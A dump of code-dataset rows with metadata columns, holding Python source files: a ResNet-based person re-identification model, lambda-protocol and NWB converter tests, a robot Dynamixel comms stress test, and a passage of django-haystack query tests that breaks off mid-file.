hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d03c86f155c8fc0c5d3590fb223cc462c303de1d | 6,353 | py | Python | models/BFE.py | anonymous1computervision/REID | 6364d7d0e75ebb81fafc765be41b9b3fd434eeae | [
"MIT"
] | null | null | null | models/BFE.py | anonymous1computervision/REID | 6364d7d0e75ebb81fafc765be41b9b3fd434eeae | [
"MIT"
] | null | null | null | models/BFE.py | anonymous1computervision/REID | 6364d7d0e75ebb81fafc765be41b9b3fd434eeae | [
"MIT"
] | 1 | 2019-09-30T12:21:21.000Z | 2019-09-30T12:21:21.000Z | # encoding: utf-8
import copy
import itertools
import numpy as np
import torch
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
import random
from scipy.spatial.distance import cdist
from sklearn.preprocessing import normalize
from torch import nn, optim
from torch.utils.data import dataloader
from torchvision import transforms
from torchvision.models.resnet import Bottleneck, resnet50
from torchvision.transforms import functional
from .resnet import ResNet
def weights_init_kaiming(m):
    """Kaiming-initialize a layer in place (intended for ``Module.apply``).

    Linear weights use fan-out mode, Conv weights fan-in; BatchNorm affine
    parameters are drawn from N(1.0, 0.02). Biases, where present, are zeroed.

    :param m: submodule handed in by ``nn.Module.apply``
    """
    classname = m.__class__.__name__
    if classname.find('Linear') != -1:
        nn.init.kaiming_normal_(m.weight, a=0, mode='fan_out')
        # Fix: guard against Linear(..., bias=False), which leaves m.bias as
        # None — the original unconditionally called constant_ and crashed.
        if m.bias is not None:
            nn.init.constant_(m.bias, 0.0)
    elif classname.find('Conv') != -1:
        nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in')
        if m.bias is not None:
            nn.init.constant_(m.bias, 0.0)
    elif classname.find('BatchNorm') != -1:
        # Only norms with learnable affine parameters have weight/bias.
        if m.affine:
            nn.init.normal_(m.weight, 1.0, 0.02)
            nn.init.constant_(m.bias, 0.0)
def weights_init_classifier(m):
    """Initialize a classifier head in place: small-std normal weights, zero bias.

    :param m: submodule handed in by ``nn.Module.apply``
    """
    classname = m.__class__.__name__
    if classname.find('Linear') != -1:
        nn.init.normal_(m.weight, std=0.001)
        # Fix: the original `if len(m.bias):` raised TypeError for layers
        # built with bias=False (m.bias is None). Test for None explicitly.
        if m.bias is not None:
            nn.init.constant_(m.bias, 0.0)
class SELayer(nn.Module):
    """Squeeze-and-Excitation block: rescale each channel by a learned gate."""

    def __init__(self, channel, reduction=16):
        super(SELayer, self).__init__()
        # Squeeze: collapse each channel's spatial map to a single scalar.
        self.avg_pool = nn.AdaptiveAvgPool2d(1)
        # Excite: bottleneck MLP ending in a per-channel sigmoid gate.
        self.fc = nn.Sequential(
            nn.Linear(channel, channel // reduction),
            nn.ReLU(inplace=True),
            nn.Linear(channel // reduction, channel),
            nn.Sigmoid()
        )

    def forward(self, x):
        batch, channels = x.size(0), x.size(1)
        squeezed = self.avg_pool(x).view(batch, channels)
        gates = self.fc(squeezed).view(batch, channels, 1, 1)
        # Broadcast the (B, C, 1, 1) gates over the spatial dimensions.
        return x * gates
class BatchDrop(nn.Module):
    """During training, zero one random rectangular patch, shared across the batch."""

    def __init__(self, h_ratio, w_ratio):
        super(BatchDrop, self).__init__()
        # Fractions of the feature-map height/width to erase.
        self.h_ratio = h_ratio
        self.w_ratio = w_ratio

    def forward(self, x):
        # Identity in evaluation mode.
        if not self.training:
            return x
        height, width = x.size()[-2:]
        drop_h = round(self.h_ratio * height)
        drop_w = round(self.w_ratio * width)
        # Same RNG call order as before: row offset first, then column.
        top = random.randint(0, height - drop_h)
        left = random.randint(0, width - drop_w)
        mask = x.new_ones(x.size())
        mask[:, :, top:top + drop_h, left:left + drop_w] = 0
        return x * mask
class BatchCrop(nn.Module):
    """During training, keep only a band of rows (wrapping around), zeroing the rest."""

    def __init__(self, ratio):
        super(BatchCrop, self).__init__()
        self.ratio = ratio

    def forward(self, x):
        if not self.training:
            return x
        height, width = x.size()[-2:]
        # NOTE(review): the band size derives from the *width* but selects
        # *rows* — preserved as-is; confirm this asymmetry is intended.
        band = int(self.ratio * width)
        start = random.randint(0, height - 1)
        if start + band > height:
            # The band runs past the bottom edge: wrap around to the top.
            keep_rows = list(range(0, start + band - height)) + list(range(start, height))
        else:
            keep_rows = list(range(start, start + band))
        mask = x.new_zeros(x.size())
        mask[:, :, keep_rows, :] = 1
        return x * mask
class BFE(nn.Module):
def __init__(self, num_classes, width_ratio=0.5, height_ratio=0.5):
super(BFE, self).__init__()
resnet = resnet50(pretrained=True)
self.backbone = nn.Sequential(
resnet.conv1,
resnet.bn1,
resnet.relu,
resnet.maxpool,
resnet.layer1, # res_conv2
resnet.layer2, # res_conv3
resnet.layer3, # res_conv4
)
self.res_part = nn.Sequential(
Bottleneck(1024, 512, stride=1, downsample=nn.Sequential(
nn.Conv2d(1024, 2048, kernel_size=1, stride=1, bias=False),
nn.BatchNorm2d(2048),
)),
Bottleneck(2048, 512),
Bottleneck(2048, 512),
)
self.res_part.load_state_dict(resnet.layer4.state_dict())
reduction = nn.Sequential(
nn.Conv2d(2048, 512, 1),
nn.BatchNorm2d(512),
nn.ReLU()
)
# global branch
self.global_avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.global_softmax = nn.Linear(512, num_classes)
self.global_softmax.apply(weights_init_kaiming)
self.global_reduction = copy.deepcopy(reduction)
self.global_reduction.apply(weights_init_kaiming)
# part branch
self.res_part2 = Bottleneck(2048, 512)
self.part_maxpool = nn.AdaptiveMaxPool2d((1, 1))
self.batch_crop = BatchDrop(height_ratio, width_ratio)
self.reduction = nn.Sequential(
nn.Linear(2048, 1024, 1),
nn.BatchNorm1d(1024),
nn.ReLU()
)
self.reduction.apply(weights_init_kaiming)
self.softmax = nn.Linear(1024, num_classes)
self.softmax.apply(weights_init_kaiming)
def forward(self, x):
"""
:param x: input image tensor of (N, C, H, W)
:return: (prediction, triplet_losses, softmax_losses)
"""
x = self.backbone(x)
x = self.res_part(x)
predict = []
triplet_features = []
softmax_features = []
# global branch
glob = self.global_avgpool(x)
global_triplet_feature = self.global_reduction(glob).squeeze()
global_softmax_class = self.global_softmax(global_triplet_feature)
softmax_features.append(global_softmax_class)
triplet_features.append(global_triplet_feature)
predict.append(global_triplet_feature)
# part branch
x = self.res_part2(x)
x = self.batch_crop(x)
triplet_feature = self.part_maxpool(x).squeeze()
feature = self.reduction(triplet_feature)
softmax_feature = self.softmax(feature)
triplet_features.append(feature)
softmax_features.append(softmax_feature)
predict.append(feature)
if self.training:
return triplet_features, softmax_features
else:
return torch.cat(predict, 1)
def get_optim_policy(self):
params = [
{'params': self.backbone.parameters()},
{'params': self.res_part.parameters()},
{'params': self.global_reduction.parameters()},
{'params': self.global_softmax.parameters()},
{'params': self.res_part2.parameters()},
{'params': self.reduction.parameters()},
{'params': self.softmax.parameters()},
]
return params | 32.248731 | 79 | 0.58618 |
7a264377a00b48cff5b6946876437e3585cb8961 | 1,579 | py | Python | perses/tests/test_lambda_protocol.py | ajsilveira/perses | adff6cecb8c710dabac1dcddf0d05306409b2362 | [
"MIT"
] | null | null | null | perses/tests/test_lambda_protocol.py | ajsilveira/perses | adff6cecb8c710dabac1dcddf0d05306409b2362 | [
"MIT"
] | null | null | null | perses/tests/test_lambda_protocol.py | ajsilveira/perses | adff6cecb8c710dabac1dcddf0d05306409b2362 | [
"MIT"
] | null | null | null | ###########################################
# IMPORTS
###########################################
from perses.annihilation.lambda_protocol import *
from unittest import skipIf
from nose.tools import raises
import os
# True when running under GitHub Actions CI (the runner exports
# GITHUB_ACTIONS='true'); used to skip tests unsuitable for CI.
running_on_github_actions = os.environ.get('GITHUB_ACTIONS', None) == 'true'
#############################################
# TESTS
#############################################
def test_lambda_protocol():
    """Smoke-test LambdaProtocol construction.

    Verifies that every built-in protocol name can be instantiated with
    defaults, and that a partial function dictionary is padded out with the
    missing default terms.
    """
    # Every named default protocol must be constructible.
    for preset in ('default', 'namd', 'quarters'):
        LambdaProtocol(functions=preset)

    # A partial specification is completed with defaults: one supplied term
    # must grow to the full set of nine lambda functions.
    partial_spec = {'lambda_sterics_delete': lambda x: x}
    protocol = LambdaProtocol(functions=partial_spec)
    assert len(partial_spec) == 1
    assert len(protocol.get_functions()) == 9
@raises(AssertionError)
def test_lambda_protocol_failure_ends():
    """A function with invalid endpoints must be rejected at construction."""
    # x -> -x ends at -1 rather than 1, violating the endpoint validation.
    LambdaProtocol(functions={'lambda_sterics_delete': lambda x: -x})
@raises(AssertionError)
def test_lambda_protocol_naked_charges():
    """Switching electrostatics on before sterics (naked charges) must be rejected."""
    # Electrostatics ramp over [0, 0.5] while sterics only begin at 0.5.
    naked_charge_functions = {
        'lambda_sterics_insert': lambda x: 0.0 if x < 0.5 else 2.0 * (x - 0.5),
        'lambda_electrostatics_insert': lambda x: 2.0 * x if x < 0.5 else 1.0,
    }
    LambdaProtocol(functions=naked_charge_functions)
| 35.886364 | 128 | 0.630146 |
19f9a68dbdb43073836a0b25a4048e26aced4f9e | 1,445 | py | Python | tests/test_converter.py | JuliaSprenger/nwb-conversion-tools | f6519c88a563fba991e9e8583ed9c4b53a3e48e5 | [
"BSD-3-Clause"
] | null | null | null | tests/test_converter.py | JuliaSprenger/nwb-conversion-tools | f6519c88a563fba991e9e8583ed9c4b53a3e48e5 | [
"BSD-3-Clause"
] | null | null | null | tests/test_converter.py | JuliaSprenger/nwb-conversion-tools | f6519c88a563fba991e9e8583ed9c4b53a3e48e5 | [
"BSD-3-Clause"
] | null | null | null | from tempfile import mkdtemp
from shutil import rmtree
from pathlib import Path
from pynwb import NWBFile
# ndx-events is an optional extension; record whether it is importable so
# the test below can no-op gracefully when it is missing.
try:
    from ndx_events import LabeledEvents
    HAVE_NDX_EVENTS = True
except ImportError:
    HAVE_NDX_EVENTS = False
from nwb_conversion_tools.basedatainterface import BaseDataInterface
from nwb_conversion_tools import NWBConverter, TutorialRecordingInterface
def test_converter():
    """Run an NWBConverter whose single interface writes ndx-events data.

    Exercises the extension path end-to-end: build a converter with a custom
    BaseDataInterface, convert to a temporary NWB file, then clean up.
    """
    if not HAVE_NDX_EVENTS:
        # Optional extension not installed; nothing to verify.
        return

    tmp_dir = Path(mkdtemp())
    output_path = str(tmp_dir / "extension_test.nwb")

    class NdxEventsInterface(BaseDataInterface):
        # Minimal interface that injects a LabeledEvents container.
        def run_conversion(self, nwbfile: NWBFile, metadata: dict):
            labeled_events = LabeledEvents(
                name="LabeledEvents",
                description="events from my experiment",
                timestamps=[0., 0.5, 0.6, 2., 2.05, 3., 3.5, 3.6, 4.],
                resolution=1e-5,
                data=[0, 1, 2, 3, 5, 0, 1, 2, 4],
                labels=["trial_start", "cue_onset", "cue_offset", "response_left", "response_right", "reward"]
            )
            nwbfile.add_acquisition(labeled_events)

    class ExtensionTestNWBConverter(NWBConverter):
        data_interface_classes = dict(NdxEvents=NdxEventsInterface)

    converter = ExtensionTestNWBConverter(source_data=dict(NdxEvents=dict()))
    converter.run_conversion(nwbfile_path=output_path, overwrite=True)
    rmtree(tmp_dir)
| 35.243902 | 114 | 0.651903 |
bccfb127a3f850cce51cb0c63ba00d6cc02e5cb2 | 1,071 | py | Python | body/test/test_dxl_comms.py | AarjuGoyal/stretch_body | 6a13fb978bd505f9b3db596a09926943ba1fc72b | [
"RSA-MD"
] | null | null | null | body/test/test_dxl_comms.py | AarjuGoyal/stretch_body | 6a13fb978bd505f9b3db596a09926943ba1fc72b | [
"RSA-MD"
] | null | null | null | body/test/test_dxl_comms.py | AarjuGoyal/stretch_body | 6a13fb978bd505f9b3db596a09926943ba1fc72b | [
"RSA-MD"
] | null | null | null | # Logging level must be set before importing any stretch_body class
import stretch_body.robot_params
#stretch_body.robot_params.RobotParams.set_logging_level("DEBUG")
import unittest
import stretch_body.device
import stretch_body.robot as robot
import numpy as np
class TestTimingStats(unittest.TestCase):
    """Exercise Dynamixel comms while the CPU is saturated.

    Heavy NumPy work on the main thread starves the robot's background
    threads; group-sync-read transactions should still complete without
    accumulating receive errors.
    """

    def test_thread_starvation_group_sync_read(self):
        r = stretch_body.robot.Robot()
        r.end_of_arm.params['use_group_sync_read'] = 1
        print('Starting test_thread_starvation')
        print('Latency timer of %f' % r.end_of_arm.params['dxl_latency_timer'])
        print('Testing on tool %s' % r.params['tool'])
        r.startup()
        try:
            # Generate a large CPU load so the comm threads get starved.
            for _ in range(100):
                np.random.rand(3, 1000, 1000).tolist()
        except (IndexError, IOError):
            self.fail("IndexError or IOError failure in comms")
        # Allow at most one receive error during the stress window.
        self.assertTrue(r.end_of_arm.comm_errors.status['n_rx'] < 2)
        r.end_of_arm.comm_errors.pretty_print()
        r.stop()
| 39.666667 | 81 | 0.693744 |
ffe35c19a370382fed199d33329e0694b82f9ad3 | 37,888 | py | Python | test_haystack/test_query.py | nakarinh14/django-haystack | b6dd72e6b5c97b782f5436b7bb4e8227ba6e3b06 | [
"BSD-3-Clause"
] | 2,021 | 2015-02-06T07:45:08.000Z | 2022-03-30T12:26:39.000Z | test_haystack/test_query.py | nakarinh14/django-haystack | b6dd72e6b5c97b782f5436b7bb4e8227ba6e3b06 | [
"BSD-3-Clause"
] | 787 | 2015-02-03T20:06:04.000Z | 2022-03-30T09:00:38.000Z | test_haystack/test_query.py | nakarinh14/django-haystack | b6dd72e6b5c97b782f5436b7bb4e8227ba6e3b06 | [
"BSD-3-Clause"
] | 878 | 2015-02-04T15:29:50.000Z | 2022-03-28T16:51:44.000Z | import datetime
import pickle
from django.test import TestCase
from django.test.utils import override_settings
from haystack import connections, indexes, reset_search_queries
from haystack.backends import SQ, BaseSearchQuery
from haystack.exceptions import FacetingError
from haystack.models import SearchResult
from haystack.query import (
EmptySearchQuerySet,
SearchQuerySet,
ValuesListSearchQuerySet,
ValuesSearchQuerySet,
)
from haystack.utils.loading import UnifiedIndex
from test_haystack.core.models import (
AnotherMockModel,
CharPKMockModel,
MockModel,
UUIDMockModel,
)
from .mocks import (
MOCK_SEARCH_RESULTS,
CharPKMockSearchBackend,
MockSearchBackend,
MockSearchQuery,
ReadQuerySetMockSearchBackend,
UUIDMockSearchBackend,
)
from .test_indexes import (
GhettoAFifthMockModelSearchIndex,
TextReadQuerySetTestSearchIndex,
)
from .test_views import BasicAnotherMockModelSearchIndex, BasicMockModelSearchIndex
class SQTestCase(TestCase):
    """Unit tests for the ``SQ`` query-fragment object: lookup-suffix
    splitting, ``repr`` rendering, and boolean composition/nesting."""

    def test_split_expression(self):
        # Each recognized lookup suffix is split off the field name; an
        # unknown suffix falls back to the default 'content' lookup.
        sq = SQ(foo="bar")
        self.assertEqual(sq.split_expression("foo"), ("foo", "content"))
        self.assertEqual(sq.split_expression("foo__exact"), ("foo", "exact"))
        self.assertEqual(sq.split_expression("foo__content"), ("foo", "content"))
        self.assertEqual(sq.split_expression("foo__contains"), ("foo", "contains"))
        self.assertEqual(sq.split_expression("foo__lt"), ("foo", "lt"))
        self.assertEqual(sq.split_expression("foo__lte"), ("foo", "lte"))
        self.assertEqual(sq.split_expression("foo__gt"), ("foo", "gt"))
        self.assertEqual(sq.split_expression("foo__gte"), ("foo", "gte"))
        self.assertEqual(sq.split_expression("foo__in"), ("foo", "in"))
        self.assertEqual(sq.split_expression("foo__startswith"), ("foo", "startswith"))
        self.assertEqual(sq.split_expression("foo__endswith"), ("foo", "endswith"))
        self.assertEqual(sq.split_expression("foo__range"), ("foo", "range"))
        self.assertEqual(sq.split_expression("foo__fuzzy"), ("foo", "fuzzy"))
        # Unrecognized filter. Fall back to exact.
        self.assertEqual(sq.split_expression("foo__moof"), ("foo", "content"))

    def test_repr(self):
        # Non-string values are rendered through str() in the repr.
        self.assertEqual(repr(SQ(foo="bar")), "<SQ: AND foo__content=bar>")
        self.assertEqual(repr(SQ(foo=1)), "<SQ: AND foo__content=1>")
        self.assertEqual(
            repr(SQ(foo=datetime.datetime(2009, 5, 12, 23, 17))),
            "<SQ: AND foo__content=2009-05-12 23:17:00>",
        )

    def test_simple_nesting(self):
        # &, | and ~ compose SQ nodes into a tree that parenthesizes
        # correctly at every nesting level.
        sq1 = SQ(foo="bar")
        sq2 = SQ(foo="bar")
        bigger_sq = SQ(sq1 & sq2)
        self.assertEqual(
            repr(bigger_sq), "<SQ: AND (foo__content=bar AND foo__content=bar)>"
        )
        another_bigger_sq = SQ(sq1 | sq2)
        self.assertEqual(
            repr(another_bigger_sq), "<SQ: AND (foo__content=bar OR foo__content=bar)>"
        )
        one_more_bigger_sq = SQ(sq1 & ~sq2)
        self.assertEqual(
            repr(one_more_bigger_sq),
            "<SQ: AND (foo__content=bar AND NOT (foo__content=bar))>",
        )
        mega_sq = SQ(bigger_sq & SQ(another_bigger_sq | ~one_more_bigger_sq))
        self.assertEqual(
            repr(mega_sq),
            "<SQ: AND ((foo__content=bar AND foo__content=bar) AND ((foo__content=bar OR foo__content=bar) OR NOT ((foo__content=bar AND NOT (foo__content=bar)))))>",
        )
class BaseSearchQueryTestCase(TestCase):
    """Tests for ``BaseSearchQuery``: filter/order/facet accumulation,
    limits, cloning, and query logging against the mock backend."""

    fixtures = ["base_data.json", "bulk_data.json"]

    def setUp(self):
        super().setUp()
        # Fresh, backend-less query object for each test.
        self.bsq = BaseSearchQuery()

    def test_get_count(self):
        # The abstract base class must not implement counting itself.
        self.bsq.add_filter(SQ(foo="bar"))
        self.assertRaises(NotImplementedError, self.bsq.get_count)

    def test_build_query(self):
        # Likewise, query building is backend-specific.
        self.bsq.add_filter(SQ(foo="bar"))
        self.assertRaises(NotImplementedError, self.bsq.build_query)

    def test_add_filter(self):
        # Filters accumulate into a single SQ tree; use_or=True joins the
        # new fragment with OR instead of the default AND.
        self.assertEqual(len(self.bsq.query_filter), 0)
        self.bsq.add_filter(SQ(foo="bar"))
        self.assertEqual(len(self.bsq.query_filter), 1)
        self.bsq.add_filter(SQ(foo__lt="10"))
        self.bsq.add_filter(~SQ(claris="moof"))
        self.bsq.add_filter(SQ(claris="moof"), use_or=True)
        self.assertEqual(
            repr(self.bsq.query_filter),
            "<SQ: OR ((foo__content=bar AND foo__lt=10 AND NOT (claris__content=moof)) OR claris__content=moof)>",
        )
        self.bsq.add_filter(SQ(claris="moof"))
        self.assertEqual(
            repr(self.bsq.query_filter),
            "<SQ: AND (((foo__content=bar AND foo__lt=10 AND NOT (claris__content=moof)) OR claris__content=moof) AND claris__content=moof)>",
        )
        self.bsq.add_filter(SQ(claris="wtf mate"))
        self.assertEqual(
            repr(self.bsq.query_filter),
            "<SQ: AND (((foo__content=bar AND foo__lt=10 AND NOT (claris__content=moof)) OR claris__content=moof) AND claris__content=moof AND claris__content=wtf mate)>",
        )

    def test_add_order_by(self):
        self.assertEqual(len(self.bsq.order_by), 0)
        self.bsq.add_order_by("foo")
        self.assertEqual(len(self.bsq.order_by), 1)

    def test_clear_order_by(self):
        self.bsq.add_order_by("foo")
        self.assertEqual(len(self.bsq.order_by), 1)
        self.bsq.clear_order_by()
        self.assertEqual(len(self.bsq.order_by), 0)

    def test_add_model(self):
        # Only Django model classes may be registered for narrowing.
        self.assertEqual(len(self.bsq.models), 0)
        self.assertRaises(AttributeError, self.bsq.add_model, object)
        self.assertEqual(len(self.bsq.models), 0)
        self.bsq.add_model(MockModel)
        self.assertEqual(len(self.bsq.models), 1)
        self.bsq.add_model(AnotherMockModel)
        self.assertEqual(len(self.bsq.models), 2)

    def test_set_limits(self):
        self.assertEqual(self.bsq.start_offset, 0)
        self.assertEqual(self.bsq.end_offset, None)
        self.bsq.set_limits(10, 50)
        self.assertEqual(self.bsq.start_offset, 10)
        self.assertEqual(self.bsq.end_offset, 50)

    def test_clear_limits(self):
        self.bsq.set_limits(10, 50)
        self.assertEqual(self.bsq.start_offset, 10)
        self.assertEqual(self.bsq.end_offset, 50)
        self.bsq.clear_limits()
        self.assertEqual(self.bsq.start_offset, 0)
        self.assertEqual(self.bsq.end_offset, None)

    def test_add_boost(self):
        self.assertEqual(self.bsq.boost, {})
        self.bsq.add_boost("foo", 10)
        self.assertEqual(self.bsq.boost, {"foo": 10})

    def test_add_highlight(self):
        self.assertEqual(self.bsq.highlight, False)
        self.bsq.add_highlight()
        self.assertEqual(self.bsq.highlight, True)

    def test_more_like_this(self):
        # Route a more-like-this lookup through the mock backend, which
        # returns the canned MOCK_SEARCH_RESULTS set.
        mock = MockModel()
        mock.id = 1
        msq = MockSearchQuery()
        msq.backend = MockSearchBackend("mlt")
        ui = connections["default"].get_unified_index()
        bmmsi = BasicMockModelSearchIndex()
        ui.build(indexes=[bmmsi])
        bmmsi.update()
        msq.more_like_this(mock)
        self.assertEqual(msq.get_count(), 23)
        self.assertEqual(int(msq.get_results()[0].pk), MOCK_SEARCH_RESULTS[0].pk)

    def test_add_field_facet(self):
        self.bsq.add_field_facet("foo")
        self.assertEqual(self.bsq.facets, {"foo": {}})
        self.bsq.add_field_facet("bar")
        self.assertEqual(self.bsq.facets, {"foo": {}, "bar": {}})

    def test_add_date_facet(self):
        self.bsq.add_date_facet(
            "foo",
            start_date=datetime.date(2009, 2, 25),
            end_date=datetime.date(2009, 3, 25),
            gap_by="day",
        )
        self.assertEqual(
            self.bsq.date_facets,
            {
                "foo": {
                    "gap_by": "day",
                    "start_date": datetime.date(2009, 2, 25),
                    "end_date": datetime.date(2009, 3, 25),
                    "gap_amount": 1,
                }
            },
        )
        self.bsq.add_date_facet(
            "bar",
            start_date=datetime.date(2008, 1, 1),
            end_date=datetime.date(2009, 12, 1),
            gap_by="month",
        )
        self.assertEqual(
            self.bsq.date_facets,
            {
                "foo": {
                    "gap_by": "day",
                    "start_date": datetime.date(2009, 2, 25),
                    "end_date": datetime.date(2009, 3, 25),
                    "gap_amount": 1,
                },
                "bar": {
                    "gap_by": "month",
                    "start_date": datetime.date(2008, 1, 1),
                    "end_date": datetime.date(2009, 12, 1),
                    "gap_amount": 1,
                },
            },
        )

    def test_add_query_facet(self):
        # Query facets are stored as an ordered list of (field, query)
        # tuples and may repeat a field.
        self.bsq.add_query_facet("foo", "bar")
        self.assertEqual(self.bsq.query_facets, [("foo", "bar")])
        self.bsq.add_query_facet("moof", "baz")
        self.assertEqual(self.bsq.query_facets, [("foo", "bar"), ("moof", "baz")])
        self.bsq.add_query_facet("foo", "baz")
        self.assertEqual(
            self.bsq.query_facets, [("foo", "bar"), ("moof", "baz"), ("foo", "baz")]
        )

    def test_add_stats(self):
        self.bsq.add_stats_query("foo", ["bar"])
        self.assertEqual(self.bsq.stats, {"foo": ["bar"]})
        self.bsq.add_stats_query("moof", ["bar", "baz"])
        self.assertEqual(self.bsq.stats, {"foo": ["bar"], "moof": ["bar", "baz"]})

    def test_add_narrow_query(self):
        self.bsq.add_narrow_query("foo:bar")
        self.assertEqual(self.bsq.narrow_queries, set(["foo:bar"]))
        self.bsq.add_narrow_query("moof:baz")
        self.assertEqual(self.bsq.narrow_queries, set(["foo:bar", "moof:baz"]))

    def test_set_result_class(self):
        # Assert that we're defaulting to ``SearchResult``.
        self.assertTrue(issubclass(self.bsq.result_class, SearchResult))

        # Custom class.
        class IttyBittyResult:
            pass

        self.bsq.set_result_class(IttyBittyResult)
        self.assertTrue(issubclass(self.bsq.result_class, IttyBittyResult))
        # Reset to default.
        self.bsq.set_result_class(None)
        self.assertTrue(issubclass(self.bsq.result_class, SearchResult))

    def test_run(self):
        # Stow.
        self.old_unified_index = connections["default"]._index
        self.ui = UnifiedIndex()
        self.bmmsi = BasicMockModelSearchIndex()
        self.bammsi = BasicAnotherMockModelSearchIndex()
        self.ui.build(indexes=[self.bmmsi, self.bammsi])
        connections["default"]._index = self.ui
        # Update the "index".
        backend = connections["default"].get_backend()
        backend.clear()
        backend.update(self.bmmsi, MockModel.objects.all())
        msq = connections["default"].get_query()
        self.assertEqual(len(msq.get_results()), 23)
        self.assertEqual(int(msq.get_results()[0].pk), MOCK_SEARCH_RESULTS[0].pk)
        # Restore.
        connections["default"]._index = self.old_unified_index

    def test_clone(self):
        # A clone must carry over every piece of accumulated query state
        # while remaining a distinct object.
        self.bsq.add_filter(SQ(foo="bar"))
        self.bsq.add_filter(SQ(foo__lt="10"))
        self.bsq.add_filter(~SQ(claris="moof"))
        self.bsq.add_filter(SQ(claris="moof"), use_or=True)
        self.bsq.add_order_by("foo")
        self.bsq.add_model(MockModel)
        self.bsq.add_boost("foo", 2)
        self.bsq.add_highlight()
        self.bsq.add_field_facet("foo")
        self.bsq.add_date_facet(
            "foo",
            start_date=datetime.date(2009, 1, 1),
            end_date=datetime.date(2009, 1, 31),
            gap_by="day",
        )
        self.bsq.add_query_facet("foo", "bar")
        self.bsq.add_stats_query("foo", "bar")
        self.bsq.add_narrow_query("foo:bar")
        clone = self.bsq._clone()
        self.assertTrue(isinstance(clone, BaseSearchQuery))
        self.assertEqual(len(clone.query_filter), 2)
        self.assertEqual(len(clone.order_by), 1)
        self.assertEqual(len(clone.models), 1)
        self.assertEqual(len(clone.boost), 1)
        self.assertEqual(clone.highlight, True)
        self.assertEqual(len(clone.facets), 1)
        self.assertEqual(len(clone.date_facets), 1)
        self.assertEqual(len(clone.query_facets), 1)
        self.assertEqual(len(clone.narrow_queries), 1)
        self.assertEqual(clone.start_offset, self.bsq.start_offset)
        self.assertEqual(clone.end_offset, self.bsq.end_offset)
        self.assertEqual(clone.backend.__class__, self.bsq.backend.__class__)

    def test_log_query(self):
        # Query logging is DEBUG-gated: nothing recorded with DEBUG=False,
        # one entry per executed query with DEBUG=True.
        reset_search_queries()
        self.assertEqual(len(connections["default"].queries), 0)
        # Stow.
        self.old_unified_index = connections["default"]._index
        self.ui = UnifiedIndex()
        self.bmmsi = BasicMockModelSearchIndex()
        self.ui.build(indexes=[self.bmmsi])
        connections["default"]._index = self.ui
        # Update the "index".
        backend = connections["default"].get_backend()
        backend.clear()
        self.bmmsi.update()
        with self.settings(DEBUG=False):
            msq = connections["default"].get_query()
            self.assertEqual(len(msq.get_results()), 23)
            self.assertEqual(len(connections["default"].queries), 0)
        with self.settings(DEBUG=True):
            # Redefine it to clear out the cached results.
            msq2 = connections["default"].get_query()
            self.assertEqual(len(msq2.get_results()), 23)
            self.assertEqual(len(connections["default"].queries), 1)
            self.assertEqual(connections["default"].queries[0]["query_string"], "")
            msq3 = connections["default"].get_query()
            msq3.add_filter(SQ(foo="bar"))
            len(msq3.get_results())
            self.assertEqual(len(connections["default"].queries), 2)
            self.assertEqual(connections["default"].queries[0]["query_string"], "")
            self.assertEqual(connections["default"].queries[1]["query_string"], "")
        # Restore.
        connections["default"]._index = self.old_unified_index
class CharPKMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
    """Index over a model whose primary key is a character field."""

    text = indexes.CharField(document=True, model_attr="key")

    def get_model(self):
        return CharPKMockModel
class SimpleMockUUIDModelIndex(indexes.SearchIndex, indexes.Indexable):
    """Index over a model whose primary key is a UUID field."""

    text = indexes.CharField(document=True, model_attr="characteristics")

    def get_model(self):
        return UUIDMockModel
@override_settings(DEBUG=True)
class SearchQuerySetTestCase(TestCase):
fixtures = ["base_data.json", "bulk_data.json"]
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.cpkmmsi = CharPKMockModelSearchIndex()
self.uuidmmsi = SimpleMockUUIDModelIndex()
self.ui.build(indexes=[self.bmmsi, self.cpkmmsi, self.uuidmmsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
self.msqs = SearchQuerySet()
# Stow.
reset_search_queries()
def tearDown(self):
# Restore.
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_len(self):
self.assertEqual(len(self.msqs), 23)
def test_repr(self):
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
self.assertRegexpMatches(
repr(self.msqs),
r"^<SearchQuerySet: query=<test_haystack.mocks.MockSearchQuery object"
r" at 0x[0-9A-Fa-f]+>, using=None>$",
)
def test_iter(self):
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
msqs = self.msqs.all()
results = [int(res.pk) for res in iter(msqs)]
self.assertEqual(results, [res.pk for res in MOCK_SEARCH_RESULTS[:23]])
self.assertEqual(len(connections["default"].queries), 3)
def test_slice(self):
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
results = self.msqs.all()
self.assertEqual(
[int(res.pk) for res in results[1:11]],
[res.pk for res in MOCK_SEARCH_RESULTS[1:11]],
)
